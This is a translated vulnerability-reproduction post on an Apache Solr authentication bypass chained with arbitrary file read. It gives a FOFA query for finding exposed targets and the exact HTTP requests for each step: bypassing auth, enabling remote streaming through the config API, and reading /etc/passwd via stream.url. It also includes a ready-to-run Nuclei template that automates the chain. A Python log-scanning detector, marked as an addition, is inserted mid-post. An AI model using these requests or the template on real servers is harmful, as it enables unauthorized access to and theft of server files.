Apache Solr is an open-source enterprise search platform built on Apache Lucene that provides full-text search, real-time indexing and distributed search. It has an authentication bypass vulnerability which, chained with the previously disclosed arbitrary file read vulnerability, allows arbitrary files to be read.
Vulnerability information
混子Hacker
01 Asset mapping
app="APACHE-Solr"
02 Vulnerability reproduction
GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host:
SolrAuth: test
Bypass authentication and obtain the core name:
POST /solr/<core name>/config:/admin/info/key HTTP/1.1
Host:
SolrAuth: test
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
Modify the core configuration:
GET /solr/<core name>/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host:
SolrAuth: test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
Read the file.
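From the defender's side, the three requests above leave a recognisable trail in access logs. The following Python is an added detection example (not part of the original post): it tags combined-log-format lines from Solr or a reverse proxy in front of it and reports clients that completed the whole chain. The log lines are constructed samples, and the tag names and the 2xx filter are assumptions of this example.

```python
"""Flag the Solr auth-bypass / file-read request chain in combined-format access logs."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines, not real traffic: the three-step chain from 10.0.0.5, one ordinary query from 10.0.0.9.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /solr/demo/config:/admin/info/key HTTP/1.1" 200 88
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /solr/demo/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "GET /solr/demo/select?q=*:*&wt=json HTTP/1.1" 200 1200
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(method: str, target: str) -> set[str]:
    """Tag one request (method + path?query) with the indicators visible in the write-up's requests."""
    parts = urlsplit(target)
    path = unquote(parts.path)          # decode %3A etc. so the ':' segment cannot hide
    query = parse_qs(parts.query)
    tags = set()
    # Every request in the chain has ':/admin/info/key' appended to the real handler path.
    if path.endswith(':/admin/info/key'):
        tags.add('path-auth-bypass')
    # Config API write: the step that turns on requestParsers.enableRemoteStreaming.
    if method == 'POST' and re.match(r'^/solr/[^/]+/config\b', path):
        tags.add('config-api-write')
    # Debug dump handler asked to stream a local file through stream.url.
    if '/debug/dump' in path and any(v.lower().startswith('file:') for v in query.get('stream.url', [])):
        tags.add('file-read-stream-url')
    return tags

def scan(log_text: str) -> dict[str, set[str]]:
    """Aggregate indicator tags per client IP, keeping only requests the server answered with 2xx."""
    per_ip: dict[str, set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m['status'].startswith('2'):
            continue
        tags = classify(m['method'], m['target'])
        if tags:
            per_ip[m['ip']] |= tags
    return dict(per_ip)

def full_chain(per_ip: dict[str, set[str]]) -> list[str]:
    """Clients that completed all three steps: bypass, config write and file read."""
    needed = {'path-auth-bypass', 'config-api-write', 'file-read-stream-url'}
    return sorted(ip for ip, tags in per_ip.items() if needed <= tags)
```

Calling `full_chain(scan(SAMPLE_LOG))` on the constructed log returns only the client that performed all three steps; the ordinary `/select` query from the other client produces no tag and is not reported.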
03 Nuclei PoC
id: solr-unauth-fileread

info:
  name: solr认证绕过导致任意文件读取漏洞
  author: Thomas
  severity: critical
  reference: none
  metadata:
    fofa-query: app="APACHE-Solr"
  tags: solr,fileread

requests:
  - raw:
      - |-
        GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate

      - |
        POST /solr/{{core}}/config:/admin/info/key HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

        {"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

      - |
        GET /solr/{{core}}/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
        Connection: close

    extractors:
      - type: regex
        internal: true
        name: core
        group: 1
        regex:
          - '"name":"(.*?)"'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:.*:0:0:"
Author: 混子Hacker
Originally published on the WeChat official account 混子Hacker: [Vulnerability reproduction] Apache Solr authentication bypass and arbitrary file read